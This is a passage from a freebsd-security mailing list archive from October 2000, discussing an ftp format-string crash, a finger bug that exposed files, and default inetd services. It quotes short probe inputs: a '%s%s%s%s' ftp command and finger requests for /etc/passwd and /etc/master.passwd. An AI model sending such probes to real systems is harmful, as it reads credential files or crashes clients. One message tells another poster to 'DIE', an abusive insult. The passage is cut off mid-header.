Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: Roger Marquis Cc: security@FreeBSD.ORG Subject: Re: ftpd bug in FreeBSD through at least 3.4 In-Reply-To: References: X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid Reply-To: nate@yogotech.com (Nate Williams) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Operating Systems like FreeBSD, lacking much in the way of backwards > compatibility, must be babied through frequent upgrades with lots of > skilled systems administration. Huh? I've got FreeBSD 1.1 binaries running on boxes that are 6-7 years old. I don't understand the issues about 'lacking backwards compatability'. Just recently my 5 year old uemacs binary failed on freefall because they (finally) deleted the shared libraries it used. I could make it work by bringing in the libraries, but it was *easier* just to upgrade to a newer binary. > Commercial Unix vendors like Sun, on the other hand, only need to be > upgraded every few years thanks to their extensive patch support. *Yeah* Suffice it to say I disagree, since Sun boxes used on the Internet *must* be upgraded to the latest/greatest version of SunOS if you intend on being truly secure. And, you end up having to roll your own versions of the software, because too often the software on them is so out-dated and buggy that it's easier to do it yourself than rely on Sun. > Backwards compatibility is often maintained across several major > revisions saving hundreds of hours of maintenance in some cases. See above. > We're still using some Sun binaries compiled 10 and 11 years ago! If FreeBSD were that old, I could say the same thing. Give me a couple of years. :) > Think of how many times you've had to recompiled FreeBSD binaries in > just the last couple of years. If you're recompiling the binaries because you *had* to, then you're misinformed. You get to recompile them, but you certainly dont' have to. Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 22:22: 7 2000 Delivered-To: freebsd-security@freebsd.org Received: from iclub.nsu.ru (iclub.nsu.ru [193.124.222.66]) by hub.freebsd.org (Postfix) with ESMTP id 998E337B502 for ; Mon, 2 Oct 2000 22:22:00 -0700 (PDT) Received: from localhost (fjoe@localhost) by iclub.nsu.ru (8.9.3/8.9.3) with ESMTP id MAA26084; Tue, 3 Oct 2000 12:20:21 +0700 (NSS) (envelope-from fjoe@iclub.nsu.ru) Date: Tue, 3 Oct 2000 12:20:20 +0700 (NSS) From: Max Khon To: Neil Blakey-Milner Cc: Brett Glass , "Chris D . Faulhaber" , security@FreeBSD.ORG Subject: Re: ftpd bug in FreeBSD through at least 3.4 In-Reply-To: <20001002204526.A58098@mithrandr.moria.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org hi, there! On Mon, 2 Oct 2000, Neil Blakey-Milner wrote: > > >The system's ftp daemon or wu-ftpd? The ftp daemons installed with 3.5.1 > > >and 4.1[.1] don't seem affected. > > > > It DEFINITELY works on FreeBSD's own ftpd in 3.4-RELEASE and all 2.x versions > > I have tested. > > This is quite cute: > > (nbm@futon) /home/nbm> ftp 127.0.0.1 > Connected to 127.0.0.1. > 220 futon.sunesi.com FTP server (Version 6.00) ready. > Name (127.0.0.1:nbm): ftp > 331 Guest login ok, send your email address as password. > Password: > 230 Guest login ok, access restrictions apply. > Remote system type is UNIX. > Using binary mode to transfer files. > ftp> quote %s%s%s%s > Segmentation fault > > As in, it crashes the ftp client. > > A 4.0 ftp client connecting to 'futon' (a 3.3 machine): > > (nbm@couch) /home/nbm> ftp futon > Connected to futon.sunesi.com. > 220 futon.sunesi.com FTP server (Version 6.00) ready. > Name (futon.sunesi.com:nbm): ftp > 331 Guest login ok, send your email address as password. > Password: > 230 Guest login ok, access restrictions apply. > Remote system type is UNIX. > Using binary mode to transfer files. > ftp> quot %s%s%s%s > 500 '%S%S%S%S': command not understood. > > A 3.4 ftp client to 'futon' also segfaults. The ftp server doesn't > segfault in the cases I've tried. this was fixed in HEAD, RELENG_4 and RELENG_3 on Jun 23 2000 (cmds.c 1.17, 1.16.2.1 and 1.14.2.3) /fjoe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 23:52:39 2000 Delivered-To: freebsd-security@freebsd.org Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id CA15637B502 for ; Mon, 2 Oct 2000 23:52:35 -0700 (PDT) Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 13gLvS-0005fj-00; Tue, 03 Oct 2000 08:51:42 +0200 Date: Tue, 3 Oct 2000 08:51:42 +0200 (IST) From: Roman Shterenzon To: Nate Williams Cc: security@FreeBSD.ORG Subject: Re: cvs commit: src/etc inetd.conf In-Reply-To: <200010030426.WAA21046@nomad.yogotech.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 2 Oct 2000, Nate Williams wrote: > > > Can we please loose everything but telnet and ftp? This getting > > > > That wouldn't bother me at all. > > I think the 'internal' auth should be on as well, since sendmail (for > silly reasons) likes it on, and the internal version is silly enough to > keep sendmail happy. If we do that, maybe we should better change UNKNOWN to UNIX in order to keep irc servers happy. --Roman Shterenzon, UNIX System Administrator and Consultant [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 0: 3: 6 2000 Delivered-To: freebsd-security@freebsd.org Received: from homer.softweyr.com (bsdconspiracy.net [208.187.122.220]) by hub.freebsd.org (Postfix) with ESMTP id 52A3237B502 for ; Tue, 3 Oct 2000 00:03:02 -0700 (PDT) Received: from localhost ([127.0.0.1] helo=softweyr.com ident=Fools trust ident!) by homer.softweyr.com with esmtp (Exim 3.16 #1) id 13gMFp-000PLt-00; Tue, 03 Oct 2000 01:12:45 -0600 Message-ID: <39D986ED.901B2A2F@softweyr.com> Date: Tue, 03 Oct 2000 01:12:45 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.75 [en] (X11; U; FreeBSD 4.1-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: Brett Glass Cc: freebsd-security@FreeBSD.ORG Subject: Re: sysinstall DOESN'T ASK, dangerous defaults! References: <39CB4C42.1A59669C@kew.com> <4.3.2.7.2.20000923222349.04919900@localhost> <4.3.2.7.2.20000927214450.04c02ec0@localhost> <4.3.2.7.2.20000929223558.04900df0@localhost> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Brett Glass wrote: > > At 01:14 AM 9/29/2000, Wes Peters wrote: > > >No, Brett, it is you who have been consistenly demanding that FreeBSD break > >the standard installation for everyone just to save you some work you're > >supposedly paid to do. > > Wes, it's not very nice of you -- to say the least -- to misrepresent > what I have said and recommended. It doesn't reflect well on you, and > causes you to come off as a flamer rather than someone who can engage > in a productive discussion. Have you not been asking for a standard FreeBSD installation in which FTP and Telnet will not work? Yes or no will suffice. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 0:30:59 2000 Delivered-To: freebsd-security@freebsd.org Received: from unicorn.blackhats.org (unicorn.blackhats.org [194.109.83.155]) by hub.freebsd.org (Postfix) with ESMTP id 7C4FB37B502; Tue, 3 Oct 2000 00:30:46 -0700 (PDT) Received: by unicorn.blackhats.org (Postfix, from userid 1002) id 7918E12C18; Tue, 3 Oct 2000 09:30:03 +0200 (CEST) Date: Tue, 3 Oct 2000 09:30:03 +0200 From: The Unicorn To: Joseph Scott Cc: Brian Somers , cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: cvs commit: src/usr.bin/finger finger.c Message-ID: <20001003093003.F89835@unicorn.blackhats.org> References: <200010022227.PAA62603@freefall.freebsd.org> <39D92E08.E00CF2E4@owp.csus.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <39D92E08.E00CF2E4@owp.csus.edu>; from joseph.scott@owp.csus.edu on Mon, Oct 02, 2000 at 05:53:28PM -0700 X-Files: The Truth Is Out There! Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 02 Oct 2000, Joseph Scott supposedly wrote: > > Brian Somers wrote: > > > > brian 2000/10/02 15:27:34 PDT > > > > Modified files: > > usr.bin/finger finger.c > > Log: > > Don't allow finger /somefile, only allow filname expansions from > > inside /etc/finger.conf > > This is one of those things that makes me go ack! So I started > trying on a couple of my machines here. I tried it first against my > own notebook running 4.1. It worked just as expected when run up > against /etc/passwd@localhost. It did not work against a 3.4 machine > from notebook though. I haven't looked to much closer at that part, > but it seems to point to this "feature" being added somewhere between > Jan 27 and Sep 14 (about the last world builds for these two > machines). I found the following: [root @ me]:.../home/unicorn(2435)# finger /etc/passwd@localhost [localhost] finger: /etc/passwd: no such user [root @ me]:.../home/unicorn(2436)# uname -a FreeBSD me.xxx.org 4.0-STABLE FreeBSD 4.0-STABLE #0: Fri Jun 2 02:42:57 CEST 2000 root@me.xxx.org:/usr/src/sys/compile/ME i386 > Another thing I've noticed, it looks like it only works against world > readable files. So some couldn't do a finger > /etc/master.passwd@goodguysrus.com and expect something back. There > are of course plenty of world readable files on a system that I > wouldn't really want everyone and their fish to look at :-( > > I'm not a fan of finger in general, turning off inetd entirely is > part of a normal install for me. > > -- > Joseph Scott > joseph.scott@owp.csus.edu > The Office Of Water Programs - CSU Sacramento --- End of Quoted Text --- Ciao, Unicorn. -- ======= _ __,;;;/ TimeWaster ================================================ ,;( )_, )~\| A Truly Wise Man Never Plays PGP: 64 07 5D 4C 3F 81 22 73 ;; // `--; Leapfrog With A Unicorn... 52 9D 87 08 51 AA 35 F0 ==='= ;\ = | ==== Youth is Not a Time in Life, It is a State of Mind! ======= Echelon Teasers: NSA CIA FBI Mossad BVD MI5 Cocaine Cuba Revolution Espionage To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 0:31:42 2000 Delivered-To: freebsd-security@freebsd.org Received: from mailgate.originative.co.uk (mailgate.originative.co.uk [194.217.50.228]) by hub.freebsd.org (Postfix) with ESMTP id 8B11F37B502; Tue, 3 Oct 2000 00:31:35 -0700 (PDT) Received: from originative.co.uk (lobster.originative.co.uk [194.217.50.241]) by mailgate.originative.co.uk (Postfix) with ESMTP id 103C21D149; Tue, 3 Oct 2000 08:31:34 +0100 (BST) Message-ID: <39D98B55.126DAFC4@originative.co.uk> Date: Tue, 03 Oct 2000 08:31:33 +0100 From: Paul Richards X-Mailer: Mozilla 4.74 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: Kris Kennaway Cc: Joseph Scott , Brian Somers , cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: cvs commit: src/usr.bin/finger finger.c References: <200010022227.PAA62603@freefall.freebsd.org> <39D92E08.E00CF2E4@owp.csus.edu> <20001002180303.A40584@freefall.freebsd.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kris Kennaway wrote: > > On Mon, Oct 02, 2000 at 05:53:28PM -0700, Joseph Scott wrote: > > > but it seems to point to this "feature" being added somewhere between > > Jan 27 and Sep 14 (about the last world builds for these two > > machines). > > It was added just before 4.1.1, and since finger runs as user nobody It's about as good as an example as there can be as to why things should be left to mature in -current for a decent length of time before being moved over to what is supposed to be a stable branch. Code may look like it's working after a few days or a few weeks but it really needs to *mature* before it can be claimed to be stable. I think we push too many enhancements from current to stable, when we should really only push bug fixes onto the stable branch. The tendency to add enhancements carries the risk of actually creating new bugs in stable which is obviously not what we want to have happen. Paul Richards FreeBSD Services Ltd To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 0:31:54 2000 Delivered-To: freebsd-security@freebsd.org Received: from homer.softweyr.com (bsdconspiracy.net [208.187.122.220]) by hub.freebsd.org (Postfix) with ESMTP id CD67D37B502 for ; Tue, 3 Oct 2000 00:31:49 -0700 (PDT) Received: from localhost ([127.0.0.1] helo=softweyr.com ident=Fools trust ident!) by homer.softweyr.com with esmtp (Exim 3.16 #1) id 13gMhN-000PMT-00; Tue, 03 Oct 2000 01:41:13 -0600 Message-ID: <39D98D98.B0627C08@softweyr.com> Date: Tue, 03 Oct 2000 01:41:12 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.75 [en] (X11; U; FreeBSD 4.1-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: Warner Losh Cc: Jordan Hubbard , security@FreeBSD.ORG Subject: Re: Security and FreeBSD, my overall perspective References: <2376.970339459@winston.osd.bsdi.com> <200009302258.QAA13969@harmony.village.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Warner Losh wrote: > > : (b) Add a new field to the ports infrastructure which indicates > : level of "trust" the project/security people have in that > : port. E.g. instead of having one big knob rather off-puttingly > : labelled 'FORBIDDEN', have a 'TRUST' or 'SECURITY_LEVEL' variable > : which goes from 1 to 10. Then the ports infrastructure can, if > : it wishes to, issue warnings of varying severity based on the > : trust level. > > 1 to 10 is too many levels. But I'm not sure what the right number > is, so let's assume it is N and move on. N == 3 { 'green', 'yellow', 'red' }. If you're feeling like a telco, throw 'blue' in there somewhere, though nobody really seems to understand what 'blue' really means. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 0:39:23 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id 11ED637B66C for ; Tue, 3 Oct 2000 00:39:21 -0700 (PDT) Received: (qmail 32333 invoked by uid 1000); 3 Oct 2000 07:40:30 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 3 Oct 2000 07:40:30 -0000 Date: Tue, 3 Oct 2000 02:40:30 -0500 (CDT) From: Mike Silbersack To: Nate Williams Cc: Jordan Hubbard , Alfred Perlstein , "Jordan K. Hubbard" , security@FreeBSD.ORG Subject: Re: cvs commit: src/etc inetd.conf In-Reply-To: <200010030426.WAA21046@nomad.yogotech.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 2 Oct 2000, Nate Williams wrote: > > > Can we please loose everything but telnet and ftp? This getting > > > > That wouldn't bother me at all. > > I think the 'internal' auth should be on as well, since sendmail (for > silly reasons) likes it on, and the internal version is silly enough to > keep sendmail happy. > > > Nate Isn't sendmail just as happy getting a RST back when it tries to connect? Auth seems to fall under the too much info category for a default install. Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 1:16:58 2000 Delivered-To: freebsd-security@freebsd.org Received: from eastwood.aldigital.algroup.co.uk (eastwood.aldigital.algroup.co.uk [194.128.162.193]) by hub.freebsd.org (Postfix) with ESMTP id 4703C37B502 for ; Tue, 3 Oct 2000 01:16:54 -0700 (PDT) Received: from algroup.co.uk ([193.195.56.225]) by eastwood.aldigital.algroup.co.uk (8.8.8/8.6.12) with ESMTP id IAA05958; Tue, 3 Oct 2000 08:16:24 GMT Message-ID: <39D995D8.14DD0721@algroup.co.uk> Date: Tue, 03 Oct 2000 09:16:24 +0100 From: Adam Laurie Organization: A.L. Group plc X-Mailer: Mozilla 4.72 [en] (Win95; U) X-Accept-Language: en MIME-Version: 1.0 To: Matt Dillon Cc: Garance A Drosihn , freebsd-security@FreeBSD.ORG Subject: Re: Proposed minor mod to openssh for interactive operation References: <200009300023.e8U0NUW20137@earth.backplane.com> <200010030000.e9300o311655@earth.backplane.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Matt Dillon wrote: > > :> two programs interactively. > :> That is, send command, wait response, send command, wait > :> response. Delaying packets is a bad idea and cuts > :> performance over the link by about 20%. > : > :Would it be more appropriate to use stunnel (in ports) instead > :of an ssh connection for your application? > : > :(I'm just wondering...) > :--- > :Garance Alistair Drosehn = gad@eclipse.acs.rpi.edu > > No, ssh provides the authentication mechanism as well as the > secure link trivially. Besides, both rsh and ssh were designed > for two-way operation so presumably they should actually do it > in a reasonably optimal manner when two-way operation is requested. stunnel can do authentication just as trivially... http://www.stunnel.org/faq/certs.html#ToC10 cheers, Adam -- Adam Laurie Tel: +44 (20) 8742 0755 A.L. Digital Ltd. Fax: +44 (20) 8742 5995 Voysey House http://www.thebunker.net Barley Mow Passage http://www.aldigital.co.uk London W4 4GB mailto:adam@algroup.co.uk UNITED KINGDOM PGP key on keyservers To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 1:34:37 2000 Delivered-To: freebsd-security@freebsd.org Received: from www14.gmx.net (www.gmx.net [194.221.183.54]) by hub.freebsd.org (Postfix) with SMTP id 8418137B502 for ; Tue, 3 Oct 2000 01:34:35 -0700 (PDT) Received: (qmail 848 invoked by uid 0); 3 Oct 2000 08:34:34 -0000 Date: Tue, 3 Oct 2000 10:34:34 +0200 (MEST) From: fastsniff@gmx.net To: freebsd-security@FreeBSD.ORG MIME-Version: 1.0 Subject: X-Priority: 3 (Normal) X-Authenticated-Sender: #0000255503@gmx.net X-Authenticated-IP: [134.102.7.202] Message-ID: <724.970562074@www14.gmx.net> X-Mailer: WWW-Mail 1.5 (Global Message Exchange) X-Flags: 0001 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org auth 72daabf7 unsubscribe freebsd-security fastsniff@gmx.net -- Sent through GMX FreeMail - http://www.gmx.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 1:38:25 2000 Delivered-To: freebsd-security@freebsd.org Received: from elvis.mu.org (elvis.mu.org [207.154.226.10]) by hub.freebsd.org (Postfix) with ESMTP id 1902E37B502; Tue, 3 Oct 2000 01:38:21 -0700 (PDT) Received: by elvis.mu.org (Postfix, from userid 1088) id 6F2662B206; Tue, 3 Oct 2000 03:38:15 -0500 (CDT) Date: Tue, 3 Oct 2000 03:38:15 -0500 From: Dave McKay To: Brett Glass Cc: Kris Kennaway , Alex Charalabidis , "Chris D . Faulhaber" , security@FreeBSD.org Subject: Re: ftpd bug in FreeBSD through at least 3.4 Message-ID: <20001003033815.A27544@elvis.mu.org> References: <4.3.2.7.2.20001002125825.00de8f00@localhost> <4.3.2.7.2.20001002123113.049344d0@localhost> <4.3.2.7.2.20001002125825.00de8f00@localhost> <20001002143917.B22329@freefall.freebsd.org> <4.3.2.7.2.20001002173916.046c16f0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <4.3.2.7.2.20001002173916.046c16f0@localhost>; from brett@lariat.org on Mon, Oct 02, 2000 at 05:43:10PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Brett, This bug was a non-issue from the start, why did you have to drag your results on to the list? Wasn't it apparent after Warner said that they no longer support older releases of FreeBSD due to resource shortness that the thread was pointless? My second rant is, have you ever noticed WHENEVER you write into the list its ALWAYS the longest current thread running within a VERY short time? Do you think this is because of your genius in the BSD OS field? Or perhaps its due to your keen wits being always about you when you write in. Please, and I mean this, DIE. Brett Glass (brett@lariat.org) wrote: > At 03:39 PM 10/2/2000, Kris Kennaway wrote: > > >No, I think your client is expanding the %s locally and sending the > >junk to the server. > > Kris: > > I think you may be right here! The client may also be expanding the > %s on the way BACK from the server. If this is the case, it is > more serious because it means that a malicious server might be > able to take over the client. > > I am checking to see if there are holes in the server, too. So > far, when I send the same strings to the server using good ol' > Telnet the server seems to respond pretty much correctly. There > are still some minor server glitches: Some error messages are sent > twice instead of once, the command is always changed to all uppercase > up to the first whitespace and then echoed back with this modification, > and trailing whitespace at the ends of commands is not ignored. But > while these things could use fixing, none of them are exploitable. > > --Brett > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Dave McKay Network Engineer - Google Inc. dave@mu.org - dave@google.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 1:47:33 2000 Delivered-To: freebsd-security@freebsd.org Received: from lucifer.ninth-circle.org (lucifer.bart.nl [194.158.168.74]) by hub.freebsd.org (Postfix) with ESMTP id 06D1A37B66C; Tue, 3 Oct 2000 01:47:25 -0700 (PDT) Received: (from asmodai@localhost) by lucifer.ninth-circle.org (8.11.0/8.11.0) id e938hGT84923; Tue, 3 Oct 2000 10:43:16 +0200 (CEST) (envelope-from asmodai) Date: Tue, 3 Oct 2000 10:43:16 +0200 From: Jeroen Ruigrok van der Werven To: Warner Losh Cc: Robert Watson , Nate Williams , Poul-Henning Kamp , James Wyatt , Brett Glass , "Chris D . Faulhaber" , security@FreeBSD.ORG Subject: Re: ftpd bug in FreeBSD through at least 3.4 Message-ID: <20001003104316.A84649@lucifer.bart.nl> References: <200010022331.RAA15790@harmony.village.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200010022331.RAA15790@harmony.village.org>; from imp@village.org on Mon, Oct 02, 2000 at 05:31:42PM -0600 Organisation: VIA Net.Works The Netherlands Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -On [20001003 01:35], Warner Losh (imp@village.org) wrote: >In message Robert Watson writes: >: I think it is too early to write off 3-STABLE as there is a huge install >: base for the branch, and many products based on it. We don't even have a >: native Netscape build for 4-STABLE yet :-). I think it is fine to assert >: that no new feature development is occuring there, however. > >According to the security officer's long standing policy, we don't >commit to support the old stale branch after we've had two releases on >the new stable branch. This doesn't mean that we prevent people from >contributing to it, just that we don't have resources to do so. It is in my own interest to get these fixes in. People are always free to ask me to put specific pieces of code in the 3-STABLE tree in a `blessed by a freebsd.org committer' way. Keep in mind I only do support work here, make sure some code gets MFC'd which will mean 3.x will be deployable for people in the near future. -- Jeroen Ruigrok van der Werven Network- and systemadministrator VIA Net.Works The Netherlands BSD: Technical excellence at its best http://www.via-net-works.nl Grant me the serenity to accept the things I cannot change, courage to change the things I can, and wisdom to know the difference... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 1:51:12 2000 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 2BD4037B502 for ; Tue, 3 Oct 2000 01:51:10 -0700 (PDT) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id KAA92537; Tue, 3 Oct 2000 10:51:05 +0200 (CEST) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Michael Bryan Cc: security@FreeBSD.ORG Subject: Re: cvs commit: src/etc inetd.conf References: <200010030008.RAA18074@freefall.freebsd.org> <20001002172133.B27736@fw.wintelcom.net> <39D93044.8B0C4E69@ursine.com> From: Dag-Erling Smorgrav Date: 03 Oct 2000 10:51:05 +0200 In-Reply-To: Michael Bryan's message of "Mon, 02 Oct 2000 18:03:00 -0700" Message-ID: Lines: 11 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Michael Bryan writes: > A command that I -always- execute on any freshly installed system, and from > time to time when checking up on things: > > netstat -an Funny way to spell "sockstat except with less information" :) DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 1:57:48 2000 Delivered-To: freebsd-security@freebsd.org Received: from homer.softweyr.com (bsdconspiracy.net [208.187.122.220]) by hub.freebsd.org (Postfix) with ESMTP id 8D84837B502 for ; Tue, 3 Oct 2000 01:57:44 -0700 (PDT) Received: from localhost ([127.0.0.1] helo=softweyr.com ident=Fools trust ident!) by homer.softweyr.com with esmtp (Exim 3.16 #1) id 13gNzY-000PRH-00; Tue, 03 Oct 2000 03:04:04 -0600 Message-ID: <39D9A104.ECAEEDCC@softweyr.com> Date: Tue, 03 Oct 2000 03:04:04 -0600 From: Wes Peters Reply-To: John Howie Organization: Softweyr LLC X-Mailer: Mozilla 4.75 [en] (X11; U; FreeBSD 4.1-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: Poul-Henning Kamp Cc: John Howie , James Wyatt , Brett Glass , "Chris D . Faulhaber" , security@FreeBSD.ORG Subject: Re: ftpd bug in FreeBSD through at least 3.4 References: <23683.970516562@critter> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <036301c02caa$ebc17300$fd01a8c0@pacbell.net>, "John Howie" writes: >> >Are you saying that if we found a terrible bug (not this easy one) >> >somewhere critical in 3.5.%d, we'd all have to immediatly upgrade? - Jy@ >> >> Yes, I am saying that. > ^^^^^^^^^^^^^^^^^^^^^ > >And this is why Linux, FreeBSD, OpenBSD, et al will NEVER beat a supported >pay-for-use Operating System like Windows in the eyes of real-world >business-critical system administrators and CIOs. Of course, all the egos, >moaning, and bitching don't help either. Oh, yeah, Mickeysoft is going to go back and fix that nasty little bug in Win95 for you, because you were a good boy and paid up your MSDN Enterprise subscription. Since this has nothing to do with security, I wisely disincluded them. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 2: 1: 1 2000 Delivered-To: freebsd-security@freebsd.org Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id B292837B502 for ; Tue, 3 Oct 2000 02:00:57 -0700 (PDT) Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 13gNqB-0005y2-00; Tue, 03 Oct 2000 10:54:23 +0200 Date: Tue, 3 Oct 2000 10:54:22 +0200 (IST) From: Roman Shterenzon To: Dave McKay Cc: security@FreeBSD.org Subject: Re: politeness [was: ftpd bug in FreeBSD through at least 3.4] In-Reply-To: <20001003033815.A27544@elvis.mu.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 3 Oct 2000, Dave McKay wrote: > Brett, ..snip.. > My second rant is, have you ever noticed WHENEVER you write into the list its ALWAYS > the longest current thread running within a VERY short time? Do you think this is > because of your genius in the BSD OS field? Or perhaps its due to your keen wits > being always about you when you write in. Please, and I mean this, DIE. Everyone has a right to write to the list and share his thoughts. The list is not moderated, you know. Perhaps some of us, sometimes, need to dedicate some more time to thinking before posting. And it includes you as well Mr. Dave McKay. --Roman Shterenzon, UNIX System Administrator and Consultant [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 2:10:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from homer.softweyr.com (bsdconspiracy.net [208.187.122.220]) by hub.freebsd.org (Postfix) with ESMTP id F204337B66D; Tue, 3 Oct 2000 02:10:08 -0700 (PDT) Received: from localhost ([127.0.0.1] helo=softweyr.com ident=Fools trust ident!) by homer.softweyr.com with esmtp (Exim 3.16 #1) id 13gOEt-000PRb-00; Tue, 03 Oct 2000 03:19:56 -0600 Message-ID: <39D9A4BB.1DB621CD@softweyr.com> Date: Tue, 03 Oct 2000 03:19:55 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.75 [en] (X11; U; FreeBSD 4.1-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: Brett Glass Cc: Kris Kennaway , Alex Charalabidis , "Chris D . Faulhaber" , security@FreeBSD.org Subject: Re: ftpd bug in FreeBSD through at least 3.4 References: <4.3.2.7.2.20001002125825.00de8f00@localhost> <4.3.2.7.2.20001002123113.049344d0@localhost> <4.3.2.7.2.20001002125825.00de8f00@localhost> <4.3.2.7.2.20001002173916.046c16f0@localhost> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 